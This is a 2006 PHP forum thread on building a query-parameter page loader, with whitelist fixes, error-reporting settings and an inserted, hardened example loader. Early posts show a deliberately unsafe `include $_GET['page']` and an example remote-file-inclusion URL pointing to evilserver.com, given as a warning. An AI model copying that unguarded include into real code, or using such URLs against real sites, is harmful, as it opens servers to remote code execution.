Topic: Page IDs
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Sun 12 Nov '06 21:46    Post subject: Page IDs

How would I do this in PHP?

Have one page that would contain other pages. Like this. Address in bar:


www.something.com/index.php?page=home

and have another page like this:

www.something.com/index.php?page=stuff


So basically I need to have one page that does a lot. I would want it to have a server-side-include that would change. Can somebody help me with that?
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7360
Location: Germany, Next to Hamburg

Posted: Sun 12 Nov '06 22:31

You can do that like
Code:

<?php
$page=$_GET['page'];
include $page;
?>


But you must be very careful with that! Some bad ppl could mess with that like

www.something.com/index.php?page=http://evilserver.com/badinput.php

So you have to check what is coming in. Or much better, create a white list!

Code:

$allowed_sites = array( "help", "main", "contact" );

if ( in_array( $_GET['page'] ) )
{
  include( './includes/' . $_GET['page'] . '.php' );
}
else
{
  die "Hacking attempt";



This script also includes from the subfolder includes. So no one can hack it.
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Mon 13 Nov '06 0:39

Thanks :D, that works great. But the safety code does not. I put that in and nothing comes up. :'(
I tried something like www.something.com/index.php?page=http://evilserver.com/badinput.php, and nothing happened. It didn't work anyway.
I was wondering if index.php could read another page with all the links? Because then I would not need to give ?name=something.php. I could just give something.
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7360
Location: Germany, Next to Hamburg

Posted: Mon 13 Nov '06 12:15

Whoops! I was in a hurry, sorry! Made some syntax errors :oops:

Code:

<?php
$allowed_sites = array( "help", "main", "contact" );

if(in_array( $_GET['page'],$allowed_sites)){
   include( './includes/' . $_GET['page'] . '.php' );
}
else
{
   die("Hacking attempt");
}
?> 


But error handling for an empty $_GET['page'] is still missing!
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Mon 13 Nov '06 15:04

This is weird.

index.php
Code:
<html>
<body>
<?php
$page=$_GET['page'];
include $page;
?>

<?php
$allowed_sites = array( "hi.php", "main", "contact" );

if(in_array( $_GET['page'],$allowed_sites)){
   include( './includes/' . $_GET['page'] . '.php' );
}
else
{
   die("Hacking attempt");
}
?>

Hi

</body>
</html>


hi.php in the folder "includes"
Code:
this is hi.php


look at some of these links:
http://data-base-web.com/tester/index.php?page=includes/hi.php

hi.php is not in this folder:
http://data-base-web.com/tester/index.php?page=hi.php

http://data-base-web.com/tester/index.php?page=hi

It is doing some of the things right.
Back to top
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7360
Location: Germany, Next to Hamburg

Posted: Mon 13 Nov '06 15:16

Why do you include the file 2 times?
include $page and include( './includes/' . $_GET['page'] . '.php' );
That makes no sense.

The include( './includes/' . $_GET['page'] . '.php' ); always includes a PHP file! You don't have to put the .php in the URL! If you do, the include tries to include e.g. include/hi.php.php

In the array $allowed_sites you don't have to set .php, only put "hi" into it.


For debugging, you should show all errors.

error_reporting(E_ALL);
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Mon 13 Nov '06 15:31

That was stupid of me. It works fine now. Thank you! :)
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Mon 13 Nov '06 20:34

I have folders (besides includes) and sub-folders and I need to have those pages too. How would I do that?

EDIT: actually can you make a script with a category and page.
It would control a folder and a file.
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

Posted: Mon 13 Nov '06 22:53

Code:
<?php

$pages = array(
   'index'    => array(
      'dir'   => '/dir1/dir2/',
      'file'   => 'page.php',
   ),
   'index2'   => array(
      'dir'   => '/dir1/dir3/',
      'file'   => 'page.php',
   ),
   'index3'   => array(
      'dir'   => '/dir1/dir2/',
      'file'   => 'page2.php',
   ),
   'index4'   => array(
      'dir'   => '/dir1/dir4/',
      'file'   => 'page.php',
   ),
);

// assuming GET here, and set to 'index' if not provided
// this is basic error correction (is_string() also rejects ?page[]=x arrays)
$page = ( isset( $_GET['page'] ) && is_string( $_GET['page'] ) ) ? strtolower( $_GET['page'] ) : 'index';

// if it's not a key of the array, let's go to the default which
// is 'index' (in_array() would search the values, not the keys)
if( !array_key_exists( $page, $pages ) )
   $page = 'index';

// now include the correct page from the appropriate dir
include( $pages[$page]['dir'] . $pages[$page]['file'] );

?>


As an example if you had:

http://www.someurl.com?page=index2

It would load the values from 'index2' which would be a path of:

/dir1/dir3/page.php

Does this make sense?

It gets complicated, but if you use arrays that are populated from a db, such as if you were using a Content Management System of some sort, then this could actually be highly flexible, making it so easy to change where pages load from, and all the while the client never knows because the URL does not change.

What's more, you can change pages based on such things as the HTTP_REFERER, the IP, the time of day, or whatever criteria you want. I use complex arrays for sites that have to change a lot, or have to change based on certain "conditions".
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Mon 13 Nov '06 22:56

I was thinking more along the lines of http://www.someurl.com/index.php?cat=folder&page=file .
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

Posted: Tue 14 Nov '06 0:03

It is the same principle, but instead you pass two vars and maybe you use multiple one-dimensional arrays, I dunno.

At some risk here, I suggest that you should really buy a book on PHP if you are working with the extreme basic stuff. Seriously, that is what I did, but you can also get a ton of info using the online manuals at php.net as well.

The example I offered could be modified in twenty different ways, or more. It's just an example, but if you would prefer to pass a bunch of variables, you have to consider error detection, correction, and by extension, security.

What happens when they pass a bunch of bogus variables across, how does your web site's backend respond?

You can write your URLs in so many ways, such as:

Code:
?c=folder&page=file
?c=folder,file
?c=folder,file,0e25b6dd4ca582a5e63d8f706af011d0 // checksum
// or you could use a session to deliver the checksum,
// using client side javascript
// sky is the limit
?c[0]=folder&c[1]=file // results in an array


So you decide based on your needs. But your needs should be guided by security, in my estimation. Security is only as sound as your knowledge base is at the time you write your code. Start with the basics, get a book - that is my sincere and humble advice.
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Tue 14 Nov '06 15:12

Well, I don't have a book now. And I need this script. I edited James' script. But it did not work. This is the script, but can you please help me?

Code:
$c=$_GET['c'];
$page=$_GET['page'];

$allowed_sites = array( "hi", "main", "contact" );

if(in_array( $_GET['c'],$_GET['page'],$allowed_sites))
{
   include( . /$_GET['c']/ . $_GET['page'] . '.php' );
}

else
{
   die("Hacking attempt");
}


Nothing comes up when I open http://data-base-web.com/tester/index.php?c=includes&page=hi .
Back to top
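A working form of the two-parameter loader attempted in the post above, which also covers the empty `$_GET['page']` case James Blond mentions earlier. This is an added example, not part of any post in the thread; the `cat`/`page` parameter names follow the URL sb.net proposed, and the `docs` folder, its page names and the `resolve_page` helper are hypothetical.

```php
<?php
// Added example (not from the thread): whitelist-based loader for
// index.php?cat=includes&page=hi. Folder and page names are assumptions.

// Every includable file is listed here. Request values reach the include
// path only after they have matched an entry in this map.
$allowed = array(
    'includes' => array('hi', 'main', 'contact'),
    'docs'     => array('intro', 'faq'),      // hypothetical second folder
);

/**
 * Map the two request parameters to a file path, or return null if the
 * combination is not whitelisted.
 */
function resolve_page(array $allowed, $cat, $page)
{
    // ?page[]=x arrives as an array, a missing parameter as null: reject both.
    if (!is_string($cat) || !is_string($page)) {
        return null;
    }
    // Third argument true = strict comparison, so no type juggling can
    // make a request value match an entry it is not identical to.
    if (!isset($allowed[$cat]) || !in_array($page, $allowed[$cat], true)) {
        return null;
    }
    return __DIR__ . '/' . $cat . '/' . $page . '.php';
}

// Missing parameters select the default page instead of raising a notice.
$cat  = isset($_GET['cat'])  ? $_GET['cat']  : 'includes';
$page = isset($_GET['page']) ? $_GET['page'] : 'main';

$file = resolve_page($allowed, $cat, $page);
if ($file === null || !is_file($file)) {
    // Record the rejected request server-side (json_encode escapes newlines,
    // so the value cannot forge log lines), then fall back to the default.
    error_log('index.php: rejected cat/page: ' . json_encode(array($cat, $page)));
    $file = resolve_page($allowed, 'includes', 'main');
}
include $file;
```

Because the path is built only from values that matched the map, requests such as `?page=http://evilserver.com/badinput.php` or `?cat=../..` fall through to the default page and leave a line in the PHP error log.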
James Blond
Moderator


Joined: 19 Jan 2006
Posts: 7360
Location: Germany, Next to Hamburg

Posted: Tue 14 Nov '06 15:56

Turn your error handling on! Or you won't see the errors!

in your php.ini

Code:

error_reporting  =  E_ALL & ~E_NOTICE
display_errors = On
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

Posted: Tue 14 Nov '06 16:00

Yes, and along with turning on error reporting, as you should for development anyway, you should also ensure you are writing to a PHP.LOG file, or PHP_ERROR.LOG, whatever you call it. You should see errors reported to some log file that you designate in your PHP.INI file. Always look at the logs for helpful troubleshooting info.
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Tue 14 Nov '06 17:55

I enabled the errors, but it does not come up with errors.
http://www.data-base-web.com/tester/index.php?cat=includes&page=hi

you can go here.
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

Posted: Tue 14 Nov '06 19:44

Paste the portion of your PHP.INI file that covers Error Reporting would you. It appears you do not have error reporting set properly by my estimation. Further, what do you have for error log set up in your PHP.INI?

You really need both the error log and the error reporting.
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Tue 14 Nov '06 19:50

Code:
; - register_long_arrays = Off     [Performance]
;     Disables registration of the older (and deprecated) long predefined array
;     variables ($HTTP_*_VARS).  Instead, use the superglobals that were
;     introduced in PHP 4.1.0
 - display_errors = On       [Security]
;     With this directive set to off, errors that occur during the execution of
;     scripts will no longer be displayed as a part of the script output, and thus,
;     will no longer be exposed to remote users.  With some errors, the error message
;     content may expose information about your script, web server, or database
;     server that may be exploitable for hacking.  Production sites should have this
;     directive set to off.
; - log_errors = On                [Security]
;     This directive complements the above one.  Any errors that occur during the
;     execution of your script will be logged (typically, to your server's error log,
;     but can be configured in several ways).  Along with setting display_errors to off,
;     this setup gives you the ability to fully understand what may have gone wrong,
;     without exposing any sensitive information to remote users.
; - output_buffering = 4096        [Performance]
;     Set a 4KB output buffer.  Enabling output buffering typically results in less
;     writes, and sometimes less packets sent on the wire, which can often lead to
;     better performance.  The gain this directive actually yields greatly depends
;     on which Web server you're working with, and what kind of scripts you're using.
; - register_argc_argv = Off       [Performance]
;     Disables registration of the somewhat redundant $argv and $argc global
;     variables.
; - magic_quotes_gpc = Off         [Performance]
;     Input data is no longer escaped with slashes so that it can be sent into
;     SQL databases without further manipulation.  Instead, you should use the
;     function addslashes() on each input element you wish to send to a database.
; - variables_order = "GPCS"       [Performance]
;     The environment variables are not hashed into the $_ENV.  To access
;     environment variables, you can use getenv() instead.
; - error_reporting = E_ALL        [Code Cleanliness, Security(?)]
;     By default, PHP suppresses errors of type E_NOTICE.  These error messages
;     are emitted for non-critical errors, but that could be a symptom of a bigger
;     problem.  Most notably, this will cause error messages about the use
;     of uninitialized variables to be displayed.
; - allow_call_time_pass_reference = Off     [Code cleanliness]
;     It's not possible to decide to force a variable to be passed by reference
;     when calling a function.  The PHP 4 style to do this is by making the
;     function require the relevant argument by reference.


I also have error_reporting = E_ALL & ~E_NOTICE
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

Posted: Tue 14 Nov '06 20:12

Okay, everything you posted above is comment text and none of it has any bearing on the functionality or performance of your server.

On my local testing server, running FCGI, here are my settings for logging and reporting errors:

Code:
error_reporting  =  E_PARSE |  E_ERROR |  E_WARNING | E_NOTICE
display_errors = On
display_startup_errors = On
log_errors = On
log_errors_max_len = 1024
ignore_repeated_errors = Off
ignore_repeated_source = Off
report_memleaks = On
track_errors = Off
error_log = c:/apache2/logs/PHP_FCGI_error.log


I chose to report most things, even notices, I like my production code to be ultra clean, though it's not really necessary I suppose.

Tell me if you have something like these settings. Notice that I created a log file with error_log = c:/apache2/logs/PHP_FCGI_error.log. I hope this helps you out a bit to get the error reporting and logging enabled and functional.

Even if you have something not shown to the screen, which in a production environment you would not want in most cases, you should be logging these errors.

Notice: None of the lines of my INI pasted above are commented out, that is, starting with a ; semicolon character. These are the basics of configuring and running a PHP based web server that a book will help you with, to get the basics down first, building a knowledge foundation.


Last edited by Brian on Tue 14 Nov '06 20:13; edited 1 time in total
Back to top
sb.net



Joined: 22 Sep 2006
Posts: 120
Location: USA

Posted: Tue 14 Nov '06 20:13

look at the 7th line
Back to top
Brian



Joined: 21 Oct 2005
Posts: 209
Location: Puyallup, WA USA

Posted: Tue 14 Nov '06 20:24

Something else that crosses my mind, why do you not have error detection and correction in place?

For example, if you say page=index but let's say someone gets cute and tries to type page=indexx or something else, what happens?

I suggest you force them back to the default page, perhaps defaulting back to page=index. Error detection can also allow you an opportunity to create through your PHP scripts custom logging, something my sites do when needed. They open and update a log file (flat text file), or make a db entry. This can be useful in some cases. Again, all basic stuff.
Back to top

